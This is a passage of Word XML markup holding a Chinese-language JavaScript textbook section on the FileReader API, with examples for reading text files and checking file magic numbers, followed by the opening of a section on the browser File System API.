      <w:r>
        <w:t>FileReaderSync</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>要使用</w:t>
      </w:r>
      <w:r>
        <w:t>FileReader</w:t>
      </w:r>
      <w:r>
        <w:t>，首先要通过</w:t>
      </w:r>
      <w:r>
        <w:t>FileReader()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数创建一个实例。然后，定义一个事件处理程序</w:t>
      </w:r>
      <w:r>
        <w:t>。通常会给</w:t>
      </w:r>
      <w:r>
        <w:t>load</w:t>
      </w:r>
      <w:r>
        <w:t>事件、</w:t>
      </w:r>
      <w:r>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:t>事件以及可能会给</w:t>
      </w:r>
      <w:r>
        <w:t>progress</w:t>
      </w:r>
      <w:r>
        <w:t>事件定义处理程序。可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>onload</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>onerror</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>onprogress</w:t>
      </w:r>
      <w:r>
        <w:t>或者使用标准的</w:t>
      </w:r>
      <w:r>
        <w:t>addEventListener()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来定义处理程序。</w:t>
      </w:r>
      <w:r>
        <w:t>FileReader</w:t>
      </w:r>
      <w:r>
        <w:t>对象还会触发</w:t>
      </w:r>
      <w:r>
        <w:t>loadstart</w:t>
      </w:r>
      <w:r>
        <w:t>事件、</w:t>
      </w:r>
      <w:r>
        <w:t>loadend</w:t>
      </w:r>
      <w:r>
        <w:t>事件以及</w:t>
      </w:r>
      <w:r>
        <w:t>abort</w:t>
      </w:r>
      <w:r>
        <w:t>事件，这些事件和同名的</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>事件一样：参见</w:t>
      </w:r>
      <w:r>
        <w:t>18.1.4</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>创建了</w:t>
      </w:r>
      <w:r>
        <w:t>FileReader</w:t>
      </w:r>
      <w:r>
        <w:t>对象并注册了对应的事件处理程序之后，必须要将要读取的</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>传递给下面这</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个方法其中之一：</w:t>
      </w:r>
      <w:r>
        <w:t>readAsT</w:t>
      </w:r>
      <w:r>
        <w:t>ext()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>readAsArrayBuffer()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>readAsDataURL()</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>readAsBinaryString()</w:t>
      </w:r>
      <w:r>
        <w:t>。（当然了，也可以先调用其中的方法，然后再注册事件处理程序</w:t>
      </w:r>
      <w:r>
        <w:t>——22.4</w:t>
      </w:r>
      <w:r>
        <w:t>节介绍过</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>天生就是单线程的，这意味着除非等到调用的函数返回以及浏览器回到事件循环阶段，否则永远不会调用事件处理程序。）这些方法中前两个方法是非常重要的，这里会对它们做相应介绍。这里每个方法都接受</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>作为第一个参数。</w:t>
      </w:r>
      <w:r>
        <w:t>readAsText()</w:t>
      </w:r>
      <w:r>
        <w:t>方法还接受第二个可选的参数，该参数指定文本</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>的编码方式。如</w:t>
      </w:r>
      <w:r>
        <w:t>果不传递该参数，则自动会采用</w:t>
      </w:r>
      <w:r>
        <w:t>ASCII</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>UTF-8</w:t>
      </w:r>
      <w:r>
        <w:t>文本（也可以通过标记字节顺序的</w:t>
      </w:r>
      <w:r>
        <w:t>UTF-16</w:t>
      </w:r>
      <w:r>
        <w:t>文本或者</w:t>
      </w:r>
      <w:r>
        <w:t>BOM</w:t>
      </w:r>
      <w:r>
        <w:t>）处理。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>FileReader</w:t>
      </w:r>
      <w:r>
        <w:t>读取指定的</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>的时候，它会更新它的</w:t>
      </w:r>
      <w:r>
        <w:t>readyState</w:t>
      </w:r>
      <w:r>
        <w:t>属性。该属性值开始是</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>，表示还未读取任何信息。当读取到一些数据的时候，它会变成</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>，而当数据完全读取完毕后，该值会变成</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>。它的</w:t>
      </w:r>
      <w:r>
        <w:t>result</w:t>
      </w:r>
      <w:r>
        <w:t>属性包含部分或者完整的结果（字符串或者</w:t>
      </w:r>
      <w:r>
        <w:t>ArrayBuffer</w:t>
      </w:r>
      <w:r>
        <w:t>形式）。一般不会直接轮询</w:t>
      </w:r>
      <w:r>
        <w:t>state</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>result</w:t>
      </w:r>
      <w:r>
        <w:t>属性，而是在</w:t>
      </w:r>
      <w:r>
        <w:t>onprogre ss</w:t>
      </w:r>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:t>onload</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序中使用它们</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>22-11</w:t>
      </w:r>
      <w:r>
        <w:t>展示了如何使用</w:t>
      </w:r>
      <w:r>
        <w:t>readAsText()</w:t>
      </w:r>
      <w:r>
        <w:t>方法读取用户选择的本地文本文件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>22-11</w:t>
      </w:r>
      <w:r>
        <w:t>：使用</w:t>
      </w:r>
      <w:r>
        <w:t>FileReader</w:t>
      </w:r>
      <w:r>
        <w:t>读取文本文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>读取指定文本文件并将内容显示在下面的＜</w:t>
      </w:r>
      <w:r>
        <w:t>pre</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function readfile(f){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var reader=new FileReader();//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个</w:t>
      </w:r>
      <w:r>
        <w:t>FileReader</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>reader.readAsText(f);//</w:t>
      </w:r>
      <w:r>
        <w:t>读取该文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>reader.onload=function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>定义一个事件处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var text=rea</w:t>
      </w:r>
      <w:r>
        <w:t>der.result;//</w:t>
      </w:r>
      <w:r>
        <w:t>这是文件内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var out=document.getElementById("output");//</w:t>
      </w:r>
      <w:r>
        <w:t>查询</w:t>
      </w:r>
      <w:r>
        <w:t>output</w:t>
      </w:r>
      <w:r>
        <w:t>元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>out.innerHTML="";//</w:t>
      </w:r>
      <w:r>
        <w:t>清除该元素内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>out.appendChild(document.createTextNode(text));//</w:t>
      </w:r>
      <w:r>
        <w:t>显示文件内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>reader.onerror=function(e){//</w:t>
      </w:r>
      <w:r>
        <w:t>如果发生了错误</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log("Error",e);//</w:t>
      </w:r>
      <w:r>
        <w:t>将错误以日志形式输出</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/script</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Select </w:t>
      </w:r>
      <w:r>
        <w:t>the file to display:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>input type="file"onchange="readfile(this.files[0])"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/input</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>pre id="output"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/pre</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readAsArrayBuffer()</w:t>
      </w:r>
      <w:r>
        <w:t>方法和</w:t>
      </w:r>
      <w:r>
        <w:t>readAsText()</w:t>
      </w:r>
      <w:r>
        <w:t>方法类似，不同的是，它额外多做了一些处理将结果以</w:t>
      </w:r>
      <w:r>
        <w:t>ArrayBuffer</w:t>
      </w:r>
      <w:r>
        <w:t>形式返回，而不是字符串形式。例</w:t>
      </w:r>
      <w:r>
        <w:t>22-12</w:t>
      </w:r>
      <w:r>
        <w:t>展示了如何使用</w:t>
      </w:r>
      <w:r>
        <w:t>readAsArrayBuffer()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，以高位优先字节顺序读取文件的前</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个字节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>22-12</w:t>
      </w:r>
      <w:r>
        <w:t>：读取</w:t>
      </w:r>
      <w:r>
        <w:t>文件的前</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个字节</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>检测指定的</w:t>
      </w:r>
      <w:r>
        <w:t>blob</w:t>
      </w:r>
      <w:r>
        <w:t>的前</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个字节</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果这个幻数标识文件的类型，那么就将其异步地设置成</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>的属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function typefile(file){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var slice=file.slice(0,4);//</w:t>
      </w:r>
      <w:r>
        <w:t>只读取文件起始部分</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var reader=new FileReader();//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个异步的</w:t>
      </w:r>
      <w:r>
        <w:t>FileReader</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>reader.readAsArrayBuffer(slice);//</w:t>
      </w:r>
      <w:r>
        <w:t>读取文件片段</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>reader.onload=function(e){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>buffer=reader.result;//ArrayBuffer</w:t>
      </w:r>
      <w:r>
        <w:t>形式的结果</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var view=new DataView(buffer);//</w:t>
      </w:r>
      <w:r>
        <w:t>访问结果中的字节内容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var magic=view.getUint32(0,false);//</w:t>
      </w:r>
      <w:r>
        <w:t>以高位优先字节顺序，读取</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个字节</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>switch(magic){//</w:t>
      </w:r>
      <w:r>
        <w:t>从中检测文件类型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>case 0x89504E47:file.verified_type="image/png";break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>case 0x47494638:file.verified_type="image</w:t>
      </w:r>
      <w:r>
        <w:t>/gif";break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>case 0x25504446:file.verified_type="application/pdf";break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>case 0x504b0304:file.verified_type="application/zip";break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log(file.name,file.verified_type);</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input type="file"onchange="typefile(this.files[0])"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/input</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>线程中，可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>FileReaderSync</w:t>
      </w:r>
      <w:r>
        <w:t>取代</w:t>
      </w:r>
      <w:r>
        <w:t>FileReader</w:t>
      </w:r>
      <w:r>
        <w:t>。同步版本的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>同样定义了</w:t>
      </w:r>
      <w:r>
        <w:t>readAsText()</w:t>
      </w:r>
      <w:r>
        <w:t>方法和</w:t>
      </w:r>
      <w:r>
        <w:t>readAsArrayBuffer()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，它们和异步版本的方法接收同样的参数。不同的地方是同步方法会阻塞住，一直到操作完成并以字符串或者</w:t>
      </w:r>
      <w:r>
        <w:t>ArrayBuffer</w:t>
      </w:r>
      <w:r>
        <w:t>形式返回结果，并且不需要使用事件处理程序。下面的例</w:t>
      </w:r>
      <w:r>
        <w:t>22-14</w:t>
      </w:r>
      <w:r>
        <w:t>就使用</w:t>
      </w:r>
      <w:r>
        <w:t>FileReaderSync</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="563" w:name="22_7_Wen_Jian_Xi_Tong_API"/>
      <w:r>
        <w:t>22.7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　文件系统</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:bookmarkEnd w:id="563"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>22.6.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　节介绍过使用</w:t>
      </w:r>
      <w:r>
        <w:t>FileReader</w:t>
      </w:r>
      <w:r>
        <w:t>类来读取用户选择的文件或者任意</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>的内</w:t>
      </w:r>
      <w:r>
        <w:t>容。其中文件的类型和</w:t>
      </w:r>
      <w:r>
        <w:t>Blob</w:t>
      </w:r>
      <w:r>
        <w:t>类型是在一份名为文件</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>的标准草案中定义的，另外还有一份比文件</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>更新的标准草案，它允许</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用对一个私有的文件系统</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>沙箱</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>进行写文件、读文件、创建目录、列出目录等一些操作。截至撰写本书时，只有</w:t>
      </w:r>
      <w:r>
        <w:t>Google</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>Chrome</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器实现了此文件系统</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，尽管此</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>相比于本章介绍的其他</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，甚至都还不够稳定，但是它依然是非常强大的，并且对本地存储器是尤为重要的，因此这里将会它进行介绍。本节会介绍基本的文件系统操作，但是不会对</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>所有的特性都一一做介绍。由于此</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>很新还未趋</w:t>
      </w:r>
      <w:r>
        <w:t>于稳定，因此在第三部分也不做介绍。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>操作本地文件系统中的文件分为以下几步：首先，必须要获取一个表示本地文件系统的对象。在</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>线程中可以使用一个同步</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>来获取该对象，相应地在主线程中也有对应的异步</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>同步地获取一个文件系统。传递文件系统的有效期和大小参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>返回一个文件系统对象或者抛出错误</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var fs=requestFileSystemSync(PERSISTENT,1024*1024);//</w:t>
      </w:r>
      <w:r>
        <w:t>异步版本的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>需要使用回调函数来处理成功和失败的情况</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>requestFileSystem(</w:t>
      </w:r>
      <w:r>
        <w:t>TEMPORARY,//</w:t>
      </w:r>
      <w:r>
        <w:t>有效期</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>50*1024*1024,//</w:t>
      </w:r>
      <w:r>
        <w:t>大小：</w:t>
      </w:r>
      <w:r>
        <w:t>50MB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function(fs){//fs</w:t>
      </w:r>
      <w:r>
        <w:t>就是该文件系统对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这里使用</w:t>
      </w:r>
      <w:r>
        <w:t>fs</w:t>
      </w:r>
      <w:r>
        <w:t>进行一些操作</w:t>
      </w:r>
    </w:p>
